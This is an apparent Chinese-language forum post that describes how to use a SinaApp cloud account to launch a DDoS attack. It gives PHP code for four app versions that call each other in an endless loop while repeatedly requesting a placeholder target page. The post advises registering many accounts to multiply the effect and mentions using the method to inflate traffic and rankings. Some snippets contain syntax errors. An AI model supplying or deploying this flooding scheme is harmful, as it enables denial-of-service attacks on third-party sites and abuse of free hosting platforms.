說是DDOS攻擊，實際上還可以用來刷流量和排名。估計這個想法很多大牛之前已經有想過，昨天在使用sinaapp時測試了下，貌似可行，所以和大家分享下。

大牛小牛應該都知道sinaapp、百度site app等都為開發者提供了很好的開放平臺，注冊也很簡單。每個用戶可以創建不同版本的app應用，攻擊者可以利用該特點，注冊大量用戶，編寫PHP代碼對目標發起攻擊，在測試過程中，我使用了一個帳號，創建了4個版本的APP進行測試，在自己站點上寫了個記錄訪問者ip的文件作為被攻擊者，效果不錯，該記錄文件每秒的容量暴漲(說明app訪問被攻擊者網站的頻率很高)。下面看下測試步驟：

PS：主要使用sinaapp作為測試對象。

測試思路：創建4個版本的app.

版本1 主頁代碼如下:

<?php 
file_get_contents('http://2.mars.sinaapp.com/');//版本1觸發攻擊(訪問版本2)  
?> 

版本2 主頁代碼:

<?php 
file_get_contents('http://www.xxx.com/ip.php')://攻擊目標  
file_get_contents('http://3.mars.sinaapp.com/');//訪問版本3  
?> 

版本3 主頁代碼:

<?php 
for ($i=1; $<=10; $i++){//這里邪惡了一下，多來幾次效果更佳  
file_get_contents('http://www.xxx.com/ip.php');  
file_get_contents('http://4.mars.sinaapp.com/'); }  
?> 

版本4 主頁代碼:

<?php 
file_get_contents('http://2.mars.sinaapp.com/');//訪問版本2，導致死循環  
?> 

以上是使用一個sinaapp用戶進行攻擊的步驟，可以自己擴展，注冊大量用戶及創建更多的版本進行攻擊。但在測試過程中發現，每個APP實際上有兩個IP出口。使用多個用戶效果會更好。

PS:大家應該會有個疑問，為什么要創建版本4，這個我也是在實驗中發現的，如果使用版本2和版本3直接互調，則達不到攻擊的效果，版本2和版本3只訪問被攻擊目標一次舊停止了。有哪位大牛知道為什么的還請不惜賜教。